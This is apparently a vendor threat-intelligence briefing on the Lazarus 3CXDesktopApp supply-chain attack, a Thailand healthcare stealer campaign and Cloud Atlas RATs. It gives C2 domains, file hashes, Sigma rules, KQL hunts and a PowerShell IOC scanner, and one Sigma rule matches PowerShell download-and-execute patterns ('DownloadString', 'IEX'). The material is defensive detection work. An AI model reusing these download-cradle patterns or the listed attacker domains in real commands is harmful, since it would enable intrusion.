Lazarus Supply Chain & Cloud Atlas RATs: OTX Pulse Analysis — Global Threat Briefing | Security Arsenal

This briefing synthesizes three critical pulses from the AlienVault OTX platform, highlighting a convergence of APT activity and crimeware targeting critical infrastructure and government sectors globally. Threat actors are increasingly leveraging trusted software supply chains and archive-based payloads to bypass defenses.

Threat Summary

Recent OTX pulses reveal a multi-faceted threat landscape:

Supply Chain Compromise (Lazarus Group): The Lazarus Group has resumed operations targeting the Finance and Energy sectors via a sophisticated supply chain attack on the 3CXDesktopApp softphone. Trojanized installers deploy malicious ffmpeg.dll binaries (TxRLoader/ArcfeedLoader) to establish C2 beacons.
Geographic Targeting (Thailand Healthcare): An unidentified threat actor is actively spear-phishing Thailand’s Ministry of Health and healthcare entities. The campaign utilizes malicious .rar archives containing obfuscated batch scripts and a Python-based stealer (sim.py), leveraging GitHub for payload hosting.
Espionage Operations (Cloud Atlas): The Inception Framework (Cloud Atlas) has expanded its toolset, targeting government and commercial entities in Russia and Belarus. New tools like PowerCloud and VBCloud are being delivered via phishing ZIPs containing malicious LNK shortcuts to facilitate data exfiltration and network reconnaissance.

Collectively, these campaigns demonstrate a shift towards complex initial access vectors—supply chain compromise and trusted archive formats—coupled with diverse malware families designed for persistence and data theft.

Threat Actor / Malware Profile

Lazarus Group (3CXDesktopApp Campaign)

Malware: TxRLoader, ArcfeedLoader
Distribution: Trojanized signed installers of legitimate 3CXDesktopApp software.
Behavior: The attack chain executes a compromised ffmpeg.dll side-loaded by the legitimate application. This DLL initiates HTTPS beacons to attacker-controlled infrastructure (e.g., akamaicontainer.com) to fetch second-stage payloads.
Anti-Analysis: Uses signed binaries to bypass application whitelisting and SSL/TLS for C2 communication to blend in with corporate traffic.

Cloud Atlas (Inception Framework)

Malware: PowerCloud, VBCloud, PowerShower, ValleyRAT, NetSupport RAT, PhantomHeart
Distribution: Phishing emails with ZIP archives containing malicious LNK shortcuts.
Behavior: Employs PowerShower for recon and VBCloud for file theft. New tools like PowerCloud indicate a shift towards cloud-based exfiltration techniques.
Persistence: LNK files provide initial execution, likely leading to scheduled tasks or registry modifications for persistence.

Unknown Actor (Thailand Healthcare)

Malware: sim.py (Python Stealer)
Distribution: Spear-phishing emails with RAR archives.
Behavior: Utilizes heavily obfuscated batch scripts to launch a Python-based stealer. Payloads are retrieved from GitHub to avoid hosting infrastructure takedowns.
Targeting: Highly focused on Ministry of Health personnel and affiliated healthcare organizations.

IOC Analysis

Indicator Types:

Domains: Multiple C2 domains were identified, including infrastructure masquerading as cloud services (azureonlinecloud.com, onedrivesupport.net). SOC teams should block these at the perimeter and DNS layer.
File Hashes: A significant number of SHA256, MD5, and SHA1 hashes were provided for the malicious DLLs, Python scripts, and loaders. These should be imported into EDR detection rules.
CVEs: Cloud Atlas activity references CVE-2018-0802 and two 2025 vulnerabilities (CVE-2025-55182, CVE-2025-68670), suggesting potential exploit use or lateral movement vectors.

Operationalization:

Blocklist: Immediately add all listed domains and file hashes to blocklists.
Hunting: Use YARA rules to scan for the ffmpeg.dll side-loading pattern and Python scripts in user directories.
Decoding: The Python stealer (sim.py) likely uses standard libraries (requests, os); memory dumps of running Python processes may reveal C2 endpoints.

Detection Engineering

YAML

---
title: Suspicious DLL Side-Loading via 3CXDesktopApp
id: 6f3a2b1c-4d5e-6f78-9a0b-1c2d3e4f5a6b
description: Detects potential trojanized 3CXDesktopApp activity characterized by the loading of a malicious ffmpeg.dll or unusual child processes spawning from the signed application.
status: stable
author: Security Arsenal
date: 2026/06/23
references:
    - https://otx.alienvault.com/pulse/643f3a2b1c4d5e6f
tags:
    - attack.persistence
    - attack.defense_evasion
    - attack.t1574.002
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\3CXDesktopApp.exe'
        ImageLoaded|endswith: '\ffmpeg.dll'
    condition: selection
falsepositives:
    - Legitimate use of 3CXDesktopApp (verify signature and file hash)
level: high
---
title: Malicious Script Execution from RAR Archive
id: 7e8f9a0b-1c2d-3e4f-5a6b-7c8d9e0f1a2b
description: Detects execution of Python or Batch scripts spawned from archive extraction processes (WinRAR/7-Zip), a pattern observed in the Thailand Healthcare campaign.
status: stable
author: Security Arsenal
date: 2026/06/23
references:
    - https://otx.alienvault.com/pulse/7e8f9a0b1c2d3e4f
tags:
    - attack.execution
    - attack.initial_access
    - attack.t1566.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\WinRAR.exe'
            - '\7zFM.exe'
    selection_child:
        Image|endswith:
            - '\python.exe'
            - '\pythonw.exe'
            - '\cmd.exe'
            - '\powershell.exe'
        CommandLine|contains:
            - '.py'
            - '.bat'
    condition: all of selection_*
falsepositives:
    - Administrative tasks involving script extraction and execution
level: medium
---
title: Cloud Atlas PowerShell Beacon
id: 8b0c1d2e-3f4a-5b6c-7d8e-9f0a1b2c3d4e
description: Detects PowerShell commands used by Cloud Atlas for reconnaissance and payload delivery, specifically targeting C2 infrastructure masquerading as cloud services.
status: stable
author: Security Arsenal
date: 2026/06/23
references:
    - https://otx.alienvault.com/pulse/8b0c1d2e3f4a5b6c
tags:
    - attack.execution
    - attack.command_and_control
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
        CommandLine|contains:
            - 'onedrivesupport.net'
            - 'allgoodsdirect.com.au'
            - 'istochnik.org'
    condition: selection
falsepositives:
    - Unknown
level: critical


kql
// Hunt for 3CX related network activity to suspicious domains
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl in~ ("akamaicontainer.com", "azureonlinecloud.com", "officeaddons.com")
| project Timestamp, DeviceName, InitiatingProcessAccount, InitiatingProcessFileName, RemoteUrl, RemoteIP
| order by Timestamp desc
;
// Hunt for Cloud Atlas domains
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl in~ ("onedrivesupport.net", "allgoodsdirect.com.au", "istochnik.org")
| project Timestamp, DeviceName, InitiatingProcessAccount, InitiatingProcessFileName, RemoteUrl, RemoteIP
| order by Timestamp desc
;
// Hunt for file hashes associated with Thailand campaign and Lazarus
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in~ (
    "5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290",
    "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983",
    "92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61",
    "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868",
    "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb",
    "442e0f4e822842922e7e4685840194e99fd68c7f0ec38c1925914b8f724d5865",
    "4eebc38297a307d18784d6f9ebc8aa6e6f69860be970cc70d9e544deb1ff6ce0",
    "523388567630e4fbdc359f75232bf2ad82671a680d4bfdce0237fc30dfec4c80",
    "74bb6ad7e1310f30a3e24fd3cbbffa2c0c41c64e89e5d0dd1d6900e96b914183",
    "7709d8c34d490509f3624104611eb75a862944dd9d7a642f44514ada16c85ee9",
    "e5f6d9d405819e6b05b5d8268a2e973294859ad65237ede36ab612b536d0ac2b"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256
| order by Timestamp desc


powershell
# Security Arsenal IOC Hunt Script
# Scans for specific SHA256 hashes associated with Lazarus and Thailand campaigns

$TargetHashes = @(
    "5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290",
    "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983",
    "92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61",
    "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868",
    "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb",
    "442e0f4e822842922e7e4685840194e99fd68c7f0ec38c1925914b8f724d5865",
    "4eebc38297a307d18784d6f9ebc8aa6e6f69860be970cc70d9e544deb1ff6ce0",
    "523388567630e4fbdc359f75232bf2ad82671a680d4bfdce0237fc30dfec4c80",
    "74bb6ad7e1310f30a3e24fd3cbbffa2c0c41c64e89e5d0dd1d6900e96b914183",
    "7709d8c34d490509f3624104611eb75a862944dd9d7a642f44514ada16c85ee9",
    "e5f6d9d405819e6b05b5d8268a2e973294859ad65237ede36ab612b536d0ac2b"
)

Write-Host "Scanning system for OTX Pulse indicators..." -ForegroundColor Cyan

# Scan C:\ and common AppData paths
$PathsToScan = @("C:\", "$env:LOCALAPPDATA", "$env:APPDATA")

foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Write-Host "Scanning $Path..." -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($TargetHashes -contains $FileHash) {
                Write-Host "[!] MATCH FOUND: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}

# Check Hosts file for Cloud Atlas C2 domains
$HostsFile = "$env:SystemRoot\System32\drivers\etc\hosts"
$C2Domains = @("akamaicontainer.com", "azureonlinecloud.com", "officeaddons.com", "onedrivesupport.net", "allgoodsdirect.com.au", "istochnik.org")

Write-Host "Checking Hosts file for malicious entires..." -ForegroundColor Yellow
if (Test-Path $HostsFile) {
    $Content = Get-Content $HostsFile
    foreach ($Domain in $C2Domains) {
        if ($Content -match $Domain) {
            Write-Host "[!] POTENTIAL HOSTS FILE HIJACKING DETECTED FOR: $Domain" -ForegroundColor Red
        }
    }
}

Write-Host "Scan complete." -ForegroundColor Green

Response Priorities

Immediate

Network Blocking: Block all domains listed in the IOC Analysis at the firewall, proxy, and DNS levels.
IOC Hunt: Execute the provided PowerShell script and KQL queries across the enterprise to identify compromised endpoints.
3CX Mitigation: If 3CXDesktopApp is in use, verify the integrity of ffmpeg.dll and update to the latest patched version immediately.

24 Hours

Identity Review: Given the presence of stealers (sim.py), audit logs for unusual authentication attempts, especially for accounts associated with the targeted healthcare and government sectors.
Supply Chain Audit: Review software build pipelines and signer certificates to ensure no other trojanized utilities are present.

1 Week

Architecture Hardening: Implement application control (AppLocker) to prevent unsigned code execution and side-loading attacks (DLL hijacking).
Email Filtering: Update secure email gateways to block RAR and ZIP archives containing LNK or batch files, or sandbox all attachments.
Vulnerability Management: Patch systems against the CVEs referenced in the Cloud Atlas campaign (CVE-2025-55182, CVE-2025-68670).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

Lazarus Supply Chain & Cloud Atlas RATs: OTX Pulse Analysis — Global Threat Briefing